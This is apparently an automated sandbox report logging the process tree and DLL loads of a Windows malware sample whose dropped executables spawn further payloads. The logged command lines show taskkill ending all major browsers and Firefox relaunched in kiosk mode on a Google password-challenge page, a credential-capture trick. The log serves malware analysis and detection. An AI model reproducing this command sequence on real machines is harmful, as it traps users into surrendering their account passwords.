Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2164 -prefMapHandle 2148 -prefsLen 25250 -prefMapSize 239580 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d656b9f2-c939-41fa-9650-c12bc10d3aaf} 6612 "\\.\pipe\gecko-crash-server-pipe.6612" 20f2056dd10 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1003039001\num.exe "C:\Users\user\AppData\Local\Temp\1003039001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4896 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 4880 -prefMapHandle 4876 -prefsLen 32262 -prefMapSize 239580 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2bbb0be4-1696-4846-9575-46d8e9741b04} 6612 "\\.\pipe\gecko-crash-server-pipe.6612" 20f3b07f710 utility
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe "C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe "C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe "C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe "C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe "C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003039001\num.exe "C:\Users\user\AppData\Local\Temp\1003039001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process created: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe "C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process created: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe "C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2208 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {423ea620-fe66-413c-8935-40f62b63c251} 5916 "\\.\pipe\gecko-crash-server-pipe.5916" 25e3236e310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2916 -parentBuildID 20230927232528 -prefsHandle 4284 -prefMapHandle 4008 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f1378f9-151b-4458-be92-e8615185ef25} 5916 "\\.\pipe\gecko-crash-server-pipe.5916" 25e448f6d10 rdd
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2164 -prefMapHandle 2148 -prefsLen 25250 -prefMapSize 239580 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d656b9f2-c939-41fa-9650-c12bc10d3aaf} 6612 "\\.\pipe\gecko-crash-server-pipe.6612" 20f2056dd10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4896 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 4880 -prefMapHandle 4876 -prefsLen 32262 -prefMapSize 239580 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2bbb0be4-1696-4846-9575-46d8e9741b04} 6612 "\\.\pipe\gecko-crash-server-pipe.6612" 20f3b07f710 utility
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: profapi.dll Jump to behavior
